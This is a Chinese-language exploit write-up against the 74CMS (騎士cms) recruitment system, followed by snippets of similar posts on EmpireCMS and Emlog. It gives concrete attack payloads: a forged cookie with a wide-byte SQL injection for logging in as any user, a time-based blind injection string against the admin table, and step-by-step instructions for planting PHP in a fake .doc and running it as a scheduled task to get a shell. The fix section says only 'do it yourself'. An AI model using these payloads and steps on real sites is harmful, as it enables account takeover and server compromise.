騎士cms注入及後台拿shell

2021-12-29 22:11:47 字數 1454 閱讀 3652

0x1 任意使用者登入

0x2 盲注

0x3 後台拿shell

0x4 隨機函式問題

詳細說明:

0x1 任意使用者登入

user/login.php

elseif((empty($_session['uid']) || empty($_session['username']) || empty($_session['utype'])) &&  $_cookie['qs']['username'] && $_cookie['qs']['password'] && $_cookie['qs']['uid'])

else

} include/fun_user.php

//檢測cookie

function check_cookie($name,$pwd)' and password = ''");

if($row['num'] > 0)

else } 

構造cookie如下

qs[uid]   2

qs[utype]      1

qs[password]       111111111111111111111

qs[username]%bf%27 or 1=1 %23

uid 為假冒使用者的id utype為使用者型別password任意

www.2cto.com  

0x2 盲注

')/**/and+if((select/**/admin_name/**/from/**/qs_admin/**/limit/**/0,1)=0x61646d696e,benchmark(1000000000,(select/**/1)),1)/**/%23

上面兩個都是寬位元組注入,如果你能猜出管理員密碼,還能解出雙重md5的話,還能猜出後台路徑,繼續看下面  

0x3 後台拿shell

1.先關閉csrf防禦功能

2.在hr工具箱中新增乙個偽造的doc,內容為<?php phpinfo();?>,記下路徑data/hrtools/2012/06/1339941553308.doc

3.在工具-計畫任務中新增任務,指令碼任務填../../data/hrtools/2012/06/1339941553308.doc

4.然後執行  

0x4 隨機函式問題(幾乎可以無視,純屬個人yy)

在admin_common.fun.inc.php中有個$qs_pwdhash是在安裝的時候賦值的,只要能猜出就可已不用解雙重md5了。

這個$qs_pwdhash是由randstr生成

function randstr($length=6)

return $hash;  } 

生成長度為6的隨機數,mt_srand()播種一樣,就會得到一樣的隨機數,所以我們最多要猜1000000次就可以了(蛋疼)

漏洞證明:  

修復方案:

do it yourself~

作者yy520

74CMS 騎士人才系統 幾個注入 可進後台

整套程式過濾的還是比較全面的 不過所有版本都是gbk編碼是他的硬傷 但是基本上字串入庫的時候作者都使用了iconv來把提交過來的資料編碼轉換成utf8 所以利用寬字元注入就沒辦法了 但是過濾完善僅限3.2版本之前 最新的3.2版本plus目錄多了幾個檔案 不知道是不是換了程式設計師了.先上兩個白痴注...

帝國cms 7 0後台拿shell

帝國cms7.0後台可上傳mod字尾的php檔案並執行裡面的php 進入後台 方法一 系統 資料表與系統模型 管理資料表 再隨意選擇乙個資料表,開啟對應資料表的 管理系統模型 如圖 匯入系統模型 可進入 loadinm.php 頁面,如圖 在本地新建乙個檔案,文字內容為 再命名為1.php.mod,...

Emlog後台拿webshell及修復辦法

新建乙個muma.php放置乙個一句話,然後建立乙個muma的資料夾 然後rar為zip的字尾 接著來到後台 安裝外掛程式 上傳zip檔案 成功後的路徑content plugins muma muma.php這個是主題包的路徑 一句話連線 看了一下官方演示版本 說明官方早就知道這個漏洞,但是這是使...